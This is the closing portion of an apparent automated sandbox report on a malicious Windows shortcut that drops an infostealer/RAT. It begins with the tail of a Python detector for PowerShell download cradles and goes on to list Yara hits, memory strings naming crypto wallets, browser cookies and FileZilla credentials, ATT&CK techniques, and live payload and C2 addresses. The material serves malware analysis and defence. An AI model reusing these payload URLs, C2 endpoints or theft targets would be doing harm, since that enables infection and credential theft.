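        "urls": urls,
        "downloads": downloads,
        # Two or more independent indicators is the (arbitrary) threshold used here.
        "suspicious": len(flags) >= 2,
    }


if __name__ == "__main__":
    for line in (CRADLE_CMDLINE, ENCODED_CMDLINE):
        print(triage(line))
```

                    Running the block prints the two triage records: the cradle carries five indicators plus the URL and the %APPDATA%\svhost.exe drop path, while the -ENC line carries only "encoded_command" and "sleep_delay" (the 20-second sleep is what the report's "May sleep (evasive loops)" signature is describing).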

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: powershell.exe, 00000000.00000002.385692015.00007FF8165D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                    Source: Yara match | File source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; the digits preceding a technique are the matrix's own per-technique annotations, kept as they appear)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Command and Scripting Interpreter; 1 Scripting; 4 PowerShell; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 1 Registry Run Keys / Startup Folder; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 111 Process Injection; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 21 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Scripting; 3 Obfuscated Files or Information; 3 Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 31 Security Software Discovery; 11 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 12 System Information Discovery; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 1 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 11 Encrypted Channel; 11 Non-Standard Port; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Generate Fraudulent Advertising Revenue
Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact
Behavior Graph ID: 796782
Sample: 07ff580e-3cfd-4c41-a92e-4ba...
Startdate: 02/02/2023
Architecture: WINDOWS
Score: 100

• Start (node 2): DNS api.ip.sb; signatures: Malicious sample detected (through community Yara rule), Antivirus / Scanner detection for submitted sample, Windows shortcut file (LNK) starts blacklisted processes, 13 other signatures; started powershell.exe 14 20 (node 9), Opgcxhsdw.exe 1 (node 14), Opgcxhsdw.exe 1 (node 16)
• powershell.exe (node 9): DNS/IP oiartzunirratia.eus 185.101.226.22, 443, 49696, HOSTINET_ASES Spain; dropped C:\Users\user\AppData\Roaming\svhost.exe, PE32; signature: Powershell drops PE file; started svhost.exe 1 4 (node 18), conhost.exe 1 (node 22)
• Opgcxhsdw.exe (node 14): signatures: Antivirus detection for dropped file, Windows shortcut file (LNK) starts blacklisted processes, Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file; started powershell.exe (node 24)
• Opgcxhsdw.exe (node 16): signature: Encrypted powershell cmdline option found; started powershell.exe (node 26)
• svhost.exe (node 18): dropped C:\Users\user\AppData\...\Opgcxhsdw.exe, PE32; signatures: Antivirus detection for dropped file, Windows shortcut file (LNK) starts blacklisted processes, Multi AV Scanner detection for dropped file, 3 other signatures; started svhost.exe 15 3 (node 28), powershell.exe 16 (node 31)
• powershell.exe (node 24): started conhost.exe (node 33)
• powershell.exe (node 26): started conhost.exe (node 35)
• svhost.exe (node 28): IP 194.26.192.248, 49697, 7053, HEANETIE Netherlands; started conhost.exe (node 37)
• powershell.exe (node 31): started conhost.exe (node 39)

Source | Detection | Scanner | Label | Link
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | 74% | ReversingLabs | Shortcut.Downloader.Ploprolo |
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | 59% | Virustotal | | Browse
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | 100% | Avira | TR/LNK.PSH.Downloader.Gen |
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
C:\Users\user\AppData\Roaming\svhost.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\svhost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |
C:\Users\user\AppData\Roaming\svhost.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |

Source | Detection | Scanner | Label | Link | Download
2.0.svhost.exe.d30000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen | | Download File
7.2.svhost.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1234943 | | Download File

Source | Detection | Scanner | Label | Link
oiartzunirratia.eus | 0% | Virustotal | | Browse
api.ip.sb | 1% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/CheckConnectResponse | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/EnvironmentSettings | 0% | URL Reputation | safe |
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://tempuri.org/ | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/CheckConnect | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/SetEnvironment | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | URL Reputation | safe |
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/GetUpdates | 0% | URL Reputation | safe |
https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/GetUpdatesResponse | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/ | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/VerifyUpdate | 0% | URL Reputation | safe |
http://tempuri.org/0 | 0% | URL Reputation | safe |
194.26.192.248:7053 | 0% | Avira URL Cloud | safe |
https://oiartzunirratia.eus | 0% | Avira URL Cloud | safe |
http://194.26.192.248:7053 | 0% | Avira URL Cloud | safe |
http://oiartzunirratia.eus | 0% | Avira URL Cloud | safe |
http://194.26.192.248:7053/ | 0% | Avira URL Cloud | safe |
194.26.192.248:7053 | 1% | Virustotal | | Browse
http://194.26.192.248:70534 | 0% | Avira URL Cloud | safe |
http://194.26.192.248:7053 | 1% | Virustotal | | Browse
https://oiartzunirratia.eusx | 0% | Avira URL Cloud | safe |
https://oiartzunirratia.eus | 0% | Virustotal | | Browse
http://oiartzunirratia.eus | 0% | Virustotal | | Browse
https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe0y | 0% | Avira URL Cloud | safe |
https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
oiartzunirratia.eus | 185.101.226.22 | true | true | | unknown
api.ip.sb | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
194.26.192.248:7053 | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://194.26.192.248:7053/ | true | Avira URL Cloud: safe | unknown
https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/ip%appdata% | svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://oiartzunirratia.eus | powershell.exe, 00000000.00000002.328014232.000001D9DD5D1000.00000004.00000800.00020000.00000000.sdmp | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://194.26.192.248:7053 | svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/CheckConnectResponse | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.328014232.000001D9DDB4A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettings | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://oiartzunirratia.eus | powershell.exe, 00000000.00000002.328014232.000001D9DD5E7000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/D | svhost.exe, 00000007.00000002.587473199.0000000003303000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/ | svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/CheckConnect | svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/SetEnvironment | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://james.newtonking.com/projects/json | svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/GetUpdates | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oiartzunirratia.eusx | powershell.exe, 00000000.00000002.328014232.000001D9DD5E2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.orgcookies//settinString.Removeg | svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://194.26.192.248:70534 | svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/GetUpdatesResponse | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe0y | powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/jsonschema | svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/ | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/VerifyUpdate | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/0 | svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson | svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.328014232.000001D9DC2A1000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/actor/next | svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.101.226.22 | oiartzunirratia.eus | Spain | 56732 | HOSTINET_ASES | true
194.26.192.248 | unknown | Netherlands | 1213 | HEANETIE | true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 796782
Start date and time: 2023-02-02 08:08:11 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 23s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winLNK@18/15@3/2
EGA Information:
• Successful, ratio: 66.7%
HDC Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
• Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
• Execution Graph export aborted for target powershell.exe, PID 4852 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
08:09:13 | API Interceptor | 119x Sleep call for process: powershell.exe modified
08:10:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Opgcxhsdw "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
08:10:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Opgcxhsdw "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                                                  No context
Process: C:\Users\user\AppData\Roaming\svhost.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1039
Entropy (8bit): 5.3436815157474165
Encrypted: false
SSDEEP: 24:ML9E4Ks2EAE4Kzr7RKDE4KhK3VZ9pKhyE4KdE4KBLWE4Ks:MxHKXEAHKzvRYHKhQnoyHKdHKBqHKs
MD5: 20799406D8EAB97C5485A916A278ED0D
SHA1: 8547571BD0A17ED48FBECDE6D5E4749A66933D53
SHA-256: BDDBB29FA099BDEB1C409FE844BDA2820D0550E0C97F7A64E01A0EAE4DBDF067
SHA-512: CA887D0283B3B65BDFA91C90FAAD4C485B3861EEE54C1E6C3A7563DA77DD0D59AC20207259084E2A85E8FC25A48EB805E86904DA60B4C165B03B4A7D758C7506
Malicious: false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutra
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9432
                                                  Entropy (8bit):4.924930598646688
                                                  Encrypted:false
                                                  SSDEEP:192:Gxoe5IpObxoe5lib4LVsm5emdzgkjDt4iWN3yBGHc9smgdcU6CkdcU6Cw9smqpOC:Xwib4Lokjh4iUxm44Qib4w
                                                  MD5:38AABE3B9AA93BFAB8A73614371C91B3
                                                  SHA1:FA8DFF5FA9309878D5B8AAE4789569842F004C18
                                                  SHA-256:F2239C11FA85634E700A10AC31606A9E80D88129B4155E5A1D5068655E6CC0EE
                                                  SHA-512:47DA224BD7DF769E9BD73FF9F1022EF3A7BBC70AD9348EF5F68CACC38553B2E1AEC00CBB15342EA940A2BB93FCAEF89C259B54FA6009CFD6DBE64EA66CDE9DA9
                                                  Malicious:false
